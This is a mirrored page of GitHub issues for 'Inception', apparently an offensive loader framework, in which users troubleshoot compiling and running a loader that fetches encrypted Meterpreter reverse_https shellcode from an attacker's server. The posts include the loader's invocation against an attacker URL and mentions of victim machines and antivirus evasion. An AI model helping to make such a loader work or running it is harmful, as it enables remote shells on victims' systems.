Coder Social home page Coder Social logo

inception's People

Contributors

two06-bounty avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

inception's Issues

Updateservice compiling issue

HI,
I am trying to compile the Roslyn code . It does compile without error but no http request initiated upon request. Below is the screenshot of visual studio (version 15.9.3). I have select the x64 as target platform but still can't get the updateservice.exe to work properly.

vs

print() is a function in Python 3

flake8 testing of https://github.com/two06/Inception on Python 3.7.0

$ flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics

./Inception.py:41:66: E999 SyntaxError: invalid syntax
	print "Shellcode payloads use meterpreter reverse_https payloads"
                                                                 ^
./Classes/shellcode_msf.py:19:56: E999 SyntaxError: invalid syntax
		print "Error: Do you have the right path to msfvenom?"
                                                       ^
2     E999 SyntaxError: invalid syntax
2

Issue trying to run .NET exe

I'm pretty sure I followed everything correctly but I'm having an issue trying to execute the .NET exe... the target it 64x and I'm sure I made the right shellcode for the reverse_https connection and put it inside the template correctly..

but when I run UpdateService.exe "http://myip:port/key" I get this

The input is not a valid Base-64 string as it contains a non-base 64 character, more than two padding characters, or an illegal character among the padding characters.
see below

image

I might have messed up somewhere along the way but I can't see where I could have, any ideas?

Also when I execute the command my server.py does pickup something, I just don't know what it's sending back to the .net exe
see below bottom 3 lines were running the exe, ignore top 4 lines (testing response with a browser)

image

Compiles fine, but wont run?

Compiles without errors, Server is installed and running, compiled binary is a little over 10mb

When I run UpdateService.exe "http://payload.server.URL/ENCRYPTION KEY" nothing happens, when I try browsing to "http://payload.server.URL/ENCRYPTION KEY" I get the 1st stage as encoded test in the browser (reloading rick rolls)

Seems to compile fine, although debugging throws this error

UpdateService.exe' has exited with code 0 (0x0)

tried opening FW ports, nothing. Nothing being blocked by AV?

Victim,
Newest/updated Win10 pro
Compiled with VS community 15.8.1

Attacking machine, Kali-rolling

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.